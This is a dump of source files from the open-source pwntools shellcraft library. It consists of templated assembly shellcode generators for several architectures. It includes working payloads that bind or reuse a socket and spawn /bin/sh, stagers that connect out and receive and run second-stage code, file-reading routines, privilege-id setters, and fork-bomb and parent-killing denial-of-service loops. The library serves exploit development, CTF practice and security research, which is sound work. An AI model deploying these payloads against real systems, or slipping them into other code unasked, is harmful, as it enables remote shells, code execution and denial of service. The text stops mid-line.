-------------------------------------------------------------------------------- 1 | <% 2 | import pwnlib.shellcraft as sc 3 | from pwnlib.shellcraft import common 4 | %> 5 | <%page args="filename, fd=1"/> 6 | <%docstring> 7 | Opens a file and writes its contents to the specified file descriptor. 8 | 9 | Example: 10 | 11 | >>> f = tempfile.mktemp() 12 | >>> write(f, 'FLAG') 13 | >>> run_assembly(shellcraft.i386.linux.cat(f)).recvall() 14 | b'FLAG' 15 | 16 | 17 | <% 18 | label = common.label("sendfile_loop") 19 | %> 20 | 21 | ${sc.pushstr(filename)} 22 | ${sc.open('esp', 'O_RDONLY', 'edx')} 23 | ${sc.sendfile(fd, 'eax', 0, 0x7fffffff)} 24 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/i386/linux/cat2.asm: -------------------------------------------------------------------------------- 1 | <% 2 | import pwnlib.shellcraft as sc 3 | from pwnlib.shellcraft import common 4 | %> 5 | <%page args="filename, fd=1, length=0x4000"/> 6 | <%docstring> 7 | Opens a file and writes its contents to the specified file descriptor. 8 | Uses an extra stack buffer and must know the length. 9 | 10 | Example: 11 | 12 | >>> f = tempfile.mktemp() 13 | >>> write(f, 'FLAG') 14 | >>> run_assembly(shellcraft.i386.linux.cat2(f)).recvall() 15 | b'FLAG' 16 | 17 | 18 | 19 | ${sc.pushstr(filename)} 20 | ${sc.open('esp', 'O_RDONLY', length)} 21 | sub esp, edx 22 | ${sc.read('eax', 'esp', 'edx')} 23 | ${sc.write(fd, 'esp', 'eax')} 24 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/i386/linux/connectstager.asm: -------------------------------------------------------------------------------- 1 | <% from pwnlib.shellcraft import common %> 2 | <% from pwnlib.shellcraft.i386 import linux %> 3 | <%docstring> 4 | connect recvsize stager 5 | Args: 6 | host, where to connect to 7 | port, which port to connect to 8 | network, ipv4 or ipv6? (default: ipv4) 9 | 10 | <%page args="host, port, network = 'ipv4'"/> 11 | 12 | ${linux.connect(host, port, network)} 13 | ${linux.recvsize('ebp', 'ecx')} 14 | ${linux.stager('ebx', 'ecx')} 15 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/i386/linux/dir.asm: -------------------------------------------------------------------------------- 1 | <% from pwnlib.shellcraft import i386, pretty %> 2 | <%page args="in_fd = 'ebp', size = 0x800, allocate_stack = True"/> 3 | <%docstring> Reads to the stack from a directory. 4 | 5 | Args: 6 | in_fd (int/str): File descriptor to be read from. 7 | size (int): Buffer size. 8 | allocate_stack (bool): allocate 'size' bytes on the stack. 9 | 10 | You can optioanlly shave a few bytes not allocating the stack space. 11 | 12 | The size read is left in eax. 13 | 14 | %if allocate_stack: 15 | sub esp, ${pretty(size)} 16 | %endif 17 | ${i386.linux.getdents(in_fd, 'esp', size)} 18 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/i386/linux/dupio.asm: -------------------------------------------------------------------------------- 1 | <% from pwnlib.shellcraft.i386.linux import dup2 %> 2 | <% from pwnlib.shellcraft.i386 import setregs %> 3 | <% from pwnlib.shellcraft import common %> 4 | <%page args="sock = 'ebp'"/> 5 | <%docstring> 6 | Args: [sock (imm/reg) = ebp] 7 | Duplicates sock to stdin, stdout and stderr 8 | 9 | <% 10 | looplabel = common.label("loop") 11 | %> 12 | 13 | /* dup() file descriptor ${sock} into stdin/stdout/stderr */ 14 | ${setregs({'ebx': sock, 'ecx': 2})} 15 | ${looplabel}: 16 | ${dup2('ebx', 'ecx')} 17 | dec ecx 18 | jns ${looplabel} 19 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/i386/linux/dupsh.asm: -------------------------------------------------------------------------------- 1 | <% from pwnlib.shellcraft import common %> 2 | <% from pwnlib.shellcraft.i386 import linux %> 3 | <%page args="sock = 'ebp'"/> 4 | <%docstring> 5 | Args: [sock (imm/reg) = ebp] 6 | Duplicates sock to stdin, stdout and stderr and spawns a shell. 7 | 8 | 9 | 10 | ${linux.dupio(sock)} 11 | 12 | ${linux.sh()} 13 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/i386/linux/echo.asm: -------------------------------------------------------------------------------- 1 | <% from pwnlib.shellcraft import i386 %> 2 | <%page args="string, sock = '1'"/> 3 | <%docstring> 4 | Writes a string to a file descriptor 5 | 6 | Example: 7 | 8 | >>> run_assembly(shellcraft.echo('hello', 1)).recvall() 9 | b'hello' 10 | 11 | 12 | 13 | ${i386.pushstr(string, append_null = False)} 14 | ${i386.linux.syscall('SYS_write', sock, 'esp', len(string))} 15 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/i386/linux/findpeersh.asm: -------------------------------------------------------------------------------- 1 | <% from pwnlib.shellcraft import common %> 2 | <% from pwnlib.shellcraft.i386 import linux %> 3 | <%page args="port = None"/> 4 | <%docstring> 5 | Args: port (defaults to any) 6 | Finds an open socket which connects to a specified 7 | port, and then opens a dup2 shell on it. 8 | 9 | 10 | 11 | ${linux.findpeer(port)} 12 | 13 | ${linux.dupsh("esi")} 14 | 15 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/i386/linux/findpeerstager.asm: -------------------------------------------------------------------------------- 1 | <% from pwnlib.shellcraft import common %> 2 | <% from pwnlib.shellcraft.i386 import linux %> 3 | <%docstring> 4 | Findpeer recvsize stager 5 | Args: 6 | port, the port given to findpeer (defaults to any) 7 | 8 | <%page args="port = None"/> 9 | 10 | ${linux.findpeer(port)} 11 | ${linux.recvsize('esi', 'ecx')} 12 | ${linux.stager('ebx', 'ecx')} 13 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/i386/linux/forkbomb.asm: -------------------------------------------------------------------------------- 1 | <% 2 | from pwnlib.shellcraft.i386.linux import fork 3 | from pwnlib.shellcraft.common import label 4 | %> 5 | <%docstring> 6 | Performs a forkbomb attack. 7 | 8 | <% 9 | dosloop = label('fork_bomb') 10 | %> 11 | ${dosloop}: 12 | ${fork()} 13 | jmp ${dosloop} 14 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/i386/linux/forkexit.asm: -------------------------------------------------------------------------------- 1 | <% 2 | from pwnlib.shellcraft import common 3 | from pwnlib.shellcraft.i386.linux import fork, exit 4 | %> 5 | <%page args=""/> 6 | <%docstring> 7 | Attempts to fork. If the fork is successful, the parent exits. 8 | 9 | <% 10 | dont_exit = common.label('forkexit') 11 | %> 12 | ${fork()} 13 | cmp eax, 1 14 | jl ${dont_exit} 15 | ${exit(0)} 16 | ${dont_exit}: 17 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/i386/linux/i386_to_amd64.asm: -------------------------------------------------------------------------------- 1 | <%docstring>Returns code to switch from i386 to amd64 mode. Trashes eax. 2 | .code32 3 | push 0x33 /* This is the segment we want to go to */ 4 | /* "db 0xff; sub al,0x24" is "jmp far [esp]" by chance */ 5 | call $+4 6 | sub al, 0x24 7 | .code64 8 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/i386/linux/kill.asm: -------------------------------------------------------------------------------- 1 | ../../common/linux/kill.asm -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/i386/linux/killparent.asm: -------------------------------------------------------------------------------- 1 | <% 2 | from pwnlib.shellcraft.i386.linux import getppid, kill 3 | from pwnlib.shellcraft.common import label 4 | %> 5 | <%docstring> 6 | Kills its parent process until whatever the parent is (probably init) 7 | cannot be killed any longer. 8 | 9 | <% 10 | killparent_loop = label('killparent') 11 | %> 12 | ${killparent_loop}: 13 | ${getppid()} 14 | ${kill('eax')} 15 | test eax, eax 16 | jz ${killparent_loop} 17 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/i386/linux/readfile.asm: -------------------------------------------------------------------------------- 1 | <% from pwnlib.shellcraft import i386 %> 2 | <%page args="path, dst = 'esi'"/> 3 | <%docstring> 4 | Args: [path, dst (imm/reg) = esi ] 5 | Opens the specified file path and sends its content to the specified file descriptor. 6 | 7 | /* Save destination */ 8 | ${i386.mov('edi', dst)} 9 | 10 | ${i386.pushstr(path)} 11 | 12 | ${i386.syscall('SYS_open', 'esp', 'O_RDONLY')} 13 | 14 | /* Save file descriptor for later */ 15 | ${i386.mov('ebp', 'eax')} 16 | 17 | ${i386.syscall('SYS_fstat', 'eax', 'esp')} 18 | 19 | /* Get file size */ 20 | add esp, 20 21 | mov esi, [esp] 22 | 23 | ${i386.syscall('SYS_sendfile', 'edi', 'ebp', 0, 'esi')} 24 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/i386/linux/readn.asm: -------------------------------------------------------------------------------- 1 | <% 2 | from pwnlib.shellcraft.i386.linux import read 3 | from pwnlib.shellcraft.i386 import setregs 4 | from pwnlib.shellcraft import common 5 | %> 6 | <%page args="fd, buf, nbytes"/> 7 | <%docstring> 8 | Reads exactly nbytes bytes from file descriptor fd into the buffer buf. 9 | 10 | Arguments: 11 | fd(int): fd 12 | buf(void): buf 13 | nbytes(size_t): nbytes 14 | 15 | <% 16 | readn_loop = common.label('readn_loop') 17 | %> 18 | ${setregs({'ecx': buf, 'edx': nbytes})} 19 | ${readn_loop}: 20 | ${read(fd, 'ecx', 'edx')} 21 | add ecx, eax 22 | sub edx, eax 23 | jnz ${readn_loop} 24 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/i386/linux/recvsize.asm: -------------------------------------------------------------------------------- 1 | <% from pwnlib.shellcraft import common %> 2 | <% from pwnlib.shellcraft import i386 %> 3 | <%docstring> 4 | Recives 4 bytes size field 5 | Useful in conjuncion with findpeer and stager 6 | Args: 7 | sock, the socket to read the payload from. 8 | reg, the place to put the size (default ecx). 9 | Leaves socket in ebx 10 | 11 | <%page args="sock, reg='ecx'"/> 12 | <% 13 | recvsize = common.label("recvsize") 14 | %> 15 | ${recvsize}: 16 | ${i386.linux.syscall('SYS_read', sock, 'esp', 4)} 17 | pop ${reg} 18 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/i386/linux/setregid.asm: -------------------------------------------------------------------------------- 1 | <% from pwnlib.shellcraft import i386 %> 2 | <%page args="gid = 'egid'"/> 3 | <%docstring> 4 | Args: [gid (imm/reg) = egid] 5 | Sets the real and effective group id. 6 | 7 | 8 | % if gid == 'egid': 9 | /* getegid */ 10 | ${i386.linux.syscall('SYS_getegid')} 11 | ${i386.mov('ebx', 'eax')} 12 | % else: 13 | ${i386.mov('ebx', gid)} 14 | % endif 15 | 16 | /* setregid(eax, eax) */ 17 | ${i386.linux.syscall('SYS_setregid', 'ebx', 'ebx')} 18 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/i386/linux/setresuid.asm: -------------------------------------------------------------------------------- 1 | <% from pwnlib.shellcraft import common %> 2 | <% from pwnlib.shellcraft.i386 import mov, linux %> 3 | <%page args="ruid=None, euid=None, suid=None"/> 4 | <%docstring> 5 | Args: [ruid = geteuid(), euid = ruid, suid = ruid] 6 | Sets real, effective and saved user ids to given values 7 | 8 | 9 | %if ruid is None: 10 | ${linux.geteuid()} 11 | <% ruid = 'eax' %> 12 | %endif 13 | <% 14 | if euid is None: euid = ruid 15 | if suid is None: suid = ruid 16 | %> 17 | 18 | ${linux.syscalls.setresuid(ruid, euid, suid)} 19 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/i386/linux/setreuid.asm: -------------------------------------------------------------------------------- 1 | <% from pwnlib.shellcraft import i386 %> 2 | <%page args="uid = 'euid'"/> 3 | <%docstring> 4 | Args: [uid (imm/reg) = euid] 5 | Sets the real and effective user id. 6 | 7 | 8 | % if uid == 'euid': 9 | /* geteuid */ 10 | ${i386.linux.syscall('SYS_geteuid')} 11 | ${i386.mov('ebx', 'eax')} 12 | % else: 13 | ${i386.mov('ebx', uid)} 14 | % endif 15 | 16 | /* setreuid(eax, eax) */ 17 | ${i386.syscall('SYS_setreuid', 'ebx', 'ebx')} 18 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/i386/linux/sh.asm: -------------------------------------------------------------------------------- 1 | <% from pwnlib.shellcraft import i386 %> 2 | <%docstring> 3 | Execute a different process. 4 | 5 | >>> p = run_assembly(shellcraft.i386.linux.sh()) 6 | >>> p.sendline(b'echo Hello') 7 | >>> p.recv() 8 | b'Hello\n' 9 | 10 | 11 | ${i386.linux.execve('/bin///sh', ['sh'], 0)} 12 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/i386/linux/sleep.asm: -------------------------------------------------------------------------------- 1 | ../../common/linux/sleep.asm -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/i386/linux/socket.asm: -------------------------------------------------------------------------------- 1 | <% from pwnlib.shellcraft.i386.linux import socketcall %> 2 | <% from pwnlib.constants import AF_INET, AF_INET6, SOCK_STREAM, SOCK_DGRAM, SYS_socketcall_socket %> 3 | <% from pwnlib.util.net import sockaddr %> 4 | <%page args="network = 'ipv4', proto = 'tcp'"/> 5 | <%docstring> 6 | Creates a new socket 7 | 8 | <% 9 | address_family = {'ipv4':AF_INET,'ipv6':AF_INET6}.get(network, network) 10 | %>\ 11 | /* open new socket */ 12 | ${socketcall(SYS_socketcall_socket, address_family, SOCK_STREAM, 0)} 13 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/i386/linux/socketcall.asm: -------------------------------------------------------------------------------- 1 | <% from pwnlib.shellcraft import common, pretty %> 2 | <% from pwnlib.shellcraft.i386 import push %> 3 | <% from pwnlib.shellcraft.i386.linux import syscall %> 4 | <% from pwnlib.constants import SYS_socketcall %> 5 | 6 | <%page args="socketcall, socket, sockaddr, sockaddr_len"/> 7 | <%docstring> 8 | Invokes a socket call (e.g. socket, send, recv, shutdown) 9 | 10 | 11 | /* socketcall(${pretty(socket,0)}, ${pretty(sockaddr,0)}, ${pretty(sockaddr_len,0)}) */ 12 | ${push(sockaddr_len)} /* socklen_t addrlen */ 13 | ${push(sockaddr)} /* sockaddr *addr */ 14 | ${push(socket)} /* sockfd */ 15 | ${syscall('SYS_socketcall', socketcall, 'esp')} 16 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/i386/linux/syscalls: -------------------------------------------------------------------------------- 1 | ../../common/linux/syscalls -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/i386/memcpy.asm: -------------------------------------------------------------------------------- 1 | <% from pwnlib.shellcraft import i386, pretty %> 2 | <%docstring>Copies memory. 3 | 4 | Args: 5 | dest: Destination address 6 | src: Source address 7 | n: Number of bytes 8 | 9 | <%page args="dest, src, n"/> 10 | 11 | /* memcpy(${pretty(dest)}, ${pretty(src)}, ${pretty(n)}) */ 12 | cld 13 | ${i386.setregs({'edi': dest, 'esi': src, 'ecx': n})} 14 | rep movsb 15 | 16 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/i386/nop.asm: -------------------------------------------------------------------------------- 1 | <%docstring>A single-byte nop instruction. 2 | nop 3 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/i386/prolog.asm: -------------------------------------------------------------------------------- 1 | <%docstring> 2 | Function prologue. 3 | 4 | 5 | push ebp 6 | mov ebp, esp 7 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/i386/ret.asm: -------------------------------------------------------------------------------- 1 | <% from pwnlib.shellcraft import i386 %> 2 | <%docstring>A single-byte RET instruction. 3 | 4 | Args: 5 | return_value: Value to return 6 | 7 | <%page args="return_value = None"/> 8 | 9 | % if return_value is not None: 10 | ${i386.mov('eax', return_value)} 11 | % endif 12 | 13 | ret 14 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/i386/stackarg.asm: -------------------------------------------------------------------------------- 1 | <%page args="index, register"/> 2 | <%docstring> 3 | Loads a stack-based argument into a register. 4 | 5 | Assumes that the 'prolog' code was used to save EBP. 6 | 7 | Arguments: 8 | index(int): 9 | Zero-based argument index. 10 | register(str): 11 | Register name. 12 | 13 | mov ${register}, [ebp+${4*(index+2)}] 14 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/i386/stackhunter_helper.asm: -------------------------------------------------------------------------------- 1 | <%page args="cookie = 0xe4fffc75"/> 2 | <%docstring> 3 | stackhunter_helper(cookie = 0xe4fffc75) 4 | 5 | The helper for the stackhunter, which prepends the cookie 6 | at different alignments. 7 | 8 | Example: 9 | 10 | >>> with context.local(arch='i386'): 11 | ... print(enhex(asm(shellcraft.stackhunter_helper()))) 12 | 75fcffe43d75fcffe43d75fcffe43d75fcffe4 13 | 14 | .int ${'%#x' % cookie} 15 | cmp eax, ${'%#x' % cookie} 16 | cmp eax, ${'%#x' % cookie} 17 | cmp eax, ${'%#x' % cookie} 18 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/i386/trap.asm: -------------------------------------------------------------------------------- 1 | <%docstring>A trap instruction. 2 | int3 3 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/loongarch64/__doc__: -------------------------------------------------------------------------------- 1 | Shellcraft module containing generic LoongArch64 shellcodes. 2 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/loongarch64/linux/__doc__: -------------------------------------------------------------------------------- 1 | Shellcraft module containing LoongArch64 shellcodes for Linux. 2 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/loongarch64/linux/syscalls: -------------------------------------------------------------------------------- 1 | ../../common/linux/syscalls -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/loongarch64/nop.asm: -------------------------------------------------------------------------------- 1 | <%docstring>LoongArch64 nop instruction. 2 | addi.d $r0, $r0, 0 3 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/loongarch64/push.asm: -------------------------------------------------------------------------------- 1 | <% 2 | from pwnlib.shellcraft import loongarch64 3 | from pwnlib import constants 4 | from pwnlib.shellcraft import registers 5 | %> 6 | <%page args="value"/> 7 | <%docstring> 8 | Pushes a value onto the stack. 9 | 10 | Register t8 is not guaranteed to be preserved. 11 | 12 | <% 13 | is_reg = value in registers.loongarch64 14 | 15 | if not is_reg and isinstance(value, (bytes, str)): 16 | try: 17 | value = constants.eval(value) 18 | except (ValueError, AttributeError): 19 | pass 20 | %> 21 | % if not is_reg: 22 | ${loongarch64.mov('t8', value)} 23 | <% value = 't8' %>\ 24 | %endif 25 | addi.d $sp, $sp, -8 26 | st.d $${value}, $sp, 0 27 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/loongarch64/trap.asm: -------------------------------------------------------------------------------- 1 | <%docstring>A trap instruction. 2 | break 0 3 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/mips/__doc__: -------------------------------------------------------------------------------- 1 | Shellcraft module containing generic MIPS shellcodes. 2 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/mips/android: -------------------------------------------------------------------------------- 1 | linux -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/mips/freebsd/__doc__: -------------------------------------------------------------------------------- 1 | Shellcraft module containing MIPS shellcodes for FreeBSD. 2 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/mips/linux/__doc__: -------------------------------------------------------------------------------- 1 | Shellcraft module containing MIPS shellcodes for Linux. 2 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/mips/linux/bindsh.asm: -------------------------------------------------------------------------------- 1 | <% from pwnlib.shellcraft.mips.linux import listen, dupsh%> 2 | <%page args="port, network='ipv4'"/> 3 | <%docstring> 4 | bindsh(port,network) 5 | 6 | Listens on a TCP port and spawns a shell for the first to connect. 7 | Port is the TCP port to listen on, network is either 'ipv4' or 'ipv6'. 8 | 9 | ${listen(port, network)} 10 | ${dupsh()} 11 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/mips/linux/dupio.asm: -------------------------------------------------------------------------------- 1 | <% from pwnlib.shellcraft import common %> 2 | <% from pwnlib.shellcraft.mips.linux import dup2 %> 3 | <% from pwnlib.shellcraft.mips import mov %> 4 | <%page args="sock = '$s0'"/> 5 | <%docstring> 6 | Args: [sock (imm/reg) = s0] 7 | Duplicates sock to stdin, stdout and stderr 8 | 9 | <% 10 | looplabel = common.label("loop") 11 | %> 12 | 13 | /* dup() file descriptor ${sock} into stdin/stdout/stderr */ 14 | ${mov('$v0',2)} 15 | ${looplabel}: 16 | ${dup2(sock,'$v0')} 17 | bgtz $v0, ${looplabel} 18 | addi $v0, -1 19 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/mips/linux/dupsh.asm: -------------------------------------------------------------------------------- 1 | <% from pwnlib.shellcraft.mips import linux %> 2 | <%page args="sock = '$s0'"/> 3 | <%docstring> 4 | Args: [sock (imm/reg) = s0 ] 5 | Duplicates sock to stdin, stdout and stderr and spawns a shell. 6 | 7 | 8 | 9 | ${linux.dupio(sock)} 10 | 11 | ${linux.sh()} 12 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/mips/linux/echo.asm: -------------------------------------------------------------------------------- 1 | <% from pwnlib.shellcraft import mips %> 2 | <%page args="string, sock = 1"/> 3 | <%docstring>Writes a string to a file descriptor 4 | 5 | ${mips.pushstr(string, append_null = False)} 6 | ${mips.linux.syscall('SYS_write', sock, '$sp', len(string))} 7 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/mips/linux/findpeersh.asm: -------------------------------------------------------------------------------- 1 | <% from pwnlib.shellcraft.mips.linux import findpeer, dupsh %> 2 | <%page args="port = None"/> 3 | <%docstring> 4 | findpeersh(port) 5 | 6 | Finds a connected socket. If port is specified it is checked 7 | against the peer port. A dup2 shell is spawned on it. 8 | 9 | ${findpeer(port)} 10 | ${dupsh()} 11 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/mips/linux/forkbomb.asm: -------------------------------------------------------------------------------- 1 | <% 2 | from pwnlib.shellcraft.mips import nop 3 | from pwnlib.shellcraft.mips.linux import fork 4 | from pwnlib.shellcraft.common import label 5 | %> 6 | <%docstring> 7 | Performs a forkbomb attack. 8 | 9 | <% 10 | dosloop = label('fork_bomb') 11 | %> 12 | ${dosloop}: 13 | ${fork()} 14 | .set noat 15 | beq $at, $at, ${dosloop} 16 | ${nop()} 17 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/mips/linux/forkexit.asm: -------------------------------------------------------------------------------- 1 | <% 2 | from pwnlib.shellcraft import common 3 | from pwnlib.shellcraft.mips.linux import fork, exit 4 | %> 5 | <%page args=""/> 6 | <%docstring> 7 | Attempts to fork. If the fork is successful, the parent exits. 8 | 9 | <% 10 | dont_exit = common.label('forkexit') 11 | %> 12 | ${fork()} 13 | blez $v0, ${dont_exit} 14 | ${exit(0)} 15 | ${dont_exit}: 16 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/mips/linux/kill.asm: -------------------------------------------------------------------------------- 1 | ../../common/linux/kill.asm -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/mips/linux/killparent.asm: -------------------------------------------------------------------------------- 1 | <% 2 | from pwnlib.shellcraft.mips.linux import getppid, kill 3 | from pwnlib.shellcraft.common import label 4 | %> 5 | <%docstring> 6 | Kills its parent process until whatever the parent is (probably init) 7 | cannot be killed any longer. 8 | 9 | <% 10 | killparent_loop = label('killparent') 11 | %> 12 | ${killparent_loop}: 13 | ${getppid()} 14 | ${kill('$v0')} 15 | beq $v0, $zero, ${killparent_loop} 16 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/mips/linux/setresuid.asm: -------------------------------------------------------------------------------- 1 | <% from pwnlib.shellcraft import common %> 2 | <% from pwnlib.shellcraft.mips import mov, linux %> 3 | <%page args="ruid=None, euid=None, suid=None"/> 4 | <%docstring> 5 | Args: [ruid = geteuid(), euid = ruid, suid = ruid] 6 | Sets real, effective and saved user ids to given values 7 | 8 | 9 | %if ruid is None: 10 | ${linux.geteuid()} 11 | <% ruid = '$v0' %> 12 | %endif 13 | <% 14 | if euid is None: euid = ruid 15 | if suid is None: suid = ruid 16 | %> 17 | 18 | ${linux.syscalls.setresuid(ruid, euid, suid)} 19 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/mips/linux/sh.asm: -------------------------------------------------------------------------------- 1 | <% from pwnlib.shellcraft import mips %> 2 | <%docstring>Execute /bin/sh 3 | 4 | Example: 5 | 6 | >>> b'\0' in pwnlib.asm.asm(shellcraft.mips.linux.sh()) 7 | False 8 | >>> p = run_assembly(shellcraft.mips.linux.sh()) 9 | >>> p.sendline(b'echo Hello') 10 | >>> p.recv() 11 | b'Hello\n' 12 | 13 | 14 | 15 | ${mips.execve('//bin/sh', ['sh'], {})} 16 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/mips/linux/sleep.asm: -------------------------------------------------------------------------------- 1 | ../../common/linux/sleep.asm -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/mips/linux/syscalls: -------------------------------------------------------------------------------- 1 | ../../common/linux/syscalls -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/mips/nop.asm: -------------------------------------------------------------------------------- 1 | <%docstring>MIPS nop instruction. 2 | add $t9, $t9, $zero /* nop */ 3 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/mips/push.asm: -------------------------------------------------------------------------------- 1 | <% 2 | from pwnlib.util import packing 3 | from pwnlib.shellcraft import mips 4 | from pwnlib import constants 5 | from pwnlib.shellcraft import registers 6 | import re 7 | %> 8 | <%page args="value"/> 9 | <%docstring> 10 | Pushes a value onto the stack. 11 | 12 | <% 13 | value_orig = value 14 | is_reg = value in registers.mips 15 | 16 | if not is_reg and isinstance(value, (bytes, str)): 17 | try: 18 | value = constants.eval(value) 19 | except (ValueError, AttributeError): 20 | pass 21 | %> 22 | % if not is_reg: 23 | ${mips.mov('$t0', value)} 24 | <% value = '$t0' %>\ 25 | %endif 26 | sw ${value}, -4($sp) 27 | addi $sp, $sp, -4 28 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/mips/trap.asm: -------------------------------------------------------------------------------- 1 | <%docstring>A trap instruction. 2 | teq $zero, $zero 3 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/powerpc/__doc__: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Gallopsled/pwntools/932cc375dadc8febce3907249162f81db1d5e0a9/pwnlib/shellcraft/templates/powerpc/__doc__ -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/powerpc/android: -------------------------------------------------------------------------------- 1 | linux -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/powerpc/linux/__doc__: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Gallopsled/pwntools/932cc375dadc8febce3907249162f81db1d5e0a9/pwnlib/shellcraft/templates/powerpc/linux/__doc__ -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/powerpc/linux/syscalls: -------------------------------------------------------------------------------- 1 | ../../common/linux/syscalls -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/riscv64/__doc__: -------------------------------------------------------------------------------- 1 | Shellcraft module containing generic RISCV64 shellcodes. 2 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/riscv64/linux/__doc__: -------------------------------------------------------------------------------- 1 | Shellcraft module containing RISCV64 shellcodes for Linux. 2 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/riscv64/linux/cat2.asm: -------------------------------------------------------------------------------- 1 | <% 2 | from pwnlib.shellcraft.riscv64 import open, syscall, mov 3 | from pwnlib.shellcraft import common 4 | %> 5 | <%page args="filename, fd=1, length=0x4000"/> 6 | <%docstring> 7 | Opens a file and writes its contents to the specified file descriptor. 8 | Uses an extra stack buffer and must know the length. 9 | 10 | 11 | ${open(filename)} 12 | ${mov('a2', length)} 13 | sub sp, sp, a2 14 | ${syscall('SYS_read', 'a0', 'sp', 'a2')} 15 | ${syscall('SYS_write', fd, 'sp', 'a0')} 16 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/riscv64/linux/kill.asm: -------------------------------------------------------------------------------- 1 | ../../common/linux/kill.asm -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/riscv64/linux/open.asm: -------------------------------------------------------------------------------- 1 | <% 2 | from pwnlib import shellcraft 3 | %> 4 | <%page args="filename, flags=0, mode='a3'"/> 5 | <%docstring> 6 | Opens a file 7 | 8 | <% 9 | AT_FDCWD=-100 10 | %> 11 | ${shellcraft.pushstr(filename)} 12 | ${shellcraft.syscall('SYS_openat', AT_FDCWD, 'sp', flags, mode)} 13 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/riscv64/linux/sleep.asm: -------------------------------------------------------------------------------- 1 | ../../common/linux/sleep.asm -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/riscv64/linux/syscalls: -------------------------------------------------------------------------------- 1 | ../../common/linux/syscalls -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/riscv64/nop.asm: -------------------------------------------------------------------------------- 1 | <%docstring>RISCV64 nop instruction. 2 | add x31, x0, x31 3 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/riscv64/push.asm: -------------------------------------------------------------------------------- 1 | <% 2 | from pwnlib.shellcraft import riscv64 3 | from pwnlib import constants 4 | from pwnlib.shellcraft import registers 5 | %> 6 | <%page args="value"/> 7 | <%docstring> 8 | Pushes a value onto the stack. 9 | 10 | Register t4 is not guaranteed to be preserved. 11 | 12 | <% 13 | is_reg = value in registers.riscv 14 | 15 | if not is_reg and isinstance(value, (bytes, str)): 16 | try: 17 | value = constants.eval(value) 18 | except (ValueError, AttributeError): 19 | pass 20 | %> 21 | % if not is_reg: 22 | ${riscv64.mov('t4', value)} 23 | <% value = 't4' %>\ 24 | %endif 25 | sd ${value}, -8(sp) 26 | addi sp, sp, -8 27 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/riscv64/trap.asm: -------------------------------------------------------------------------------- 1 | <%docstring>A trap instruction. 2 | ebreak 3 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/thumb/__doc__: -------------------------------------------------------------------------------- 1 | Shellcraft module containing generic thumb little endian 